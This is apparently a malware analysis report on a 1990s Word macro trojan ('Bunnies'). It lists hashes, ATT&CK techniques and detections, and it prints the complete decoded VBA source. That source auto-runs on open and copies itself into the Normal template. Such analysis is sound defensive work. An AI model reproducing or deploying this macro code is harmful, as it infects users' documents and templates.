Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9ec9eb2b5d01f858…

MALICIOUS

Office (OLE)

Size: 27.0 KB
Created: 2000-03-16 08:23:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 31b148e088e7ac81a14e3cf7fd8efa3a
SHA-1: a4047fb9ab6eee7eedbbc0e10ae7870b1703c980
SHA-256: 9ec9eb2b5d01f85809aa4018ce99cf0e4085e9c65616c6fa75a6e0336ac862d7
Risk score: 200

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, a common technique for executing malicious code as soon as the document is opened. The macro exports its own module as 'bunnies.cpl' to 'C:\windows\system\bunnies.cpl' and, when that file is already present on a later open, imports it into the NormalTemplate, likely to establish persistence or facilitate further execution. The ClamAV detection 'Doc.Trojan.Bunny-2' further supports the malicious nature of the file.

Heuristics (4)

  • ClamAV: Doc.Trojan.Bunny-2 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bunny-2
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen macro, which runs automatically when the document is opened
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1018 bytes
SHA-256: b929a4bc3d64819a1ad511f1f49cefddf952f0102040aa6a14ae7ccc6623a891
Detection: ClamAV: Doc.Trojan.Bunny-2
Obfuscation or payload: unlikely

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Bunnies"
Public SCode As String
' W97T/Bunnies .a
' Word Trojan Bunnies by Error
Sub AutoOpen()
On Error Resume Next
 Application.EnableCancelKey = wdCancelDisabled
Options.SaveNormalPrompt = False
SCode = Dir("C:\windows\system\bunnies.cpl")
If SCode = "bunnies.cpl" Then Call Spread Else
ActiveDocument.VBProject.VBComponents("Bunnies").Export ("C:\Windows\System\Bunnies.cpl")
End Sub
Function Spread()
On Error Resume Next
 Application.EnableCancelKey = wdCancelDisabled
' Begin to do what bunnies do...
For X = 1 To 10000 Step 1
    With NormalTemplate.VBProject.VBComponents.Import("C:\Windows\System\Bunnies.cpl")
Next X
NormalTemplate.Save
MsgBox "Bunnies!!!!", 48
Kill "C:\Windows\System\Bunnies.cpl"
End Function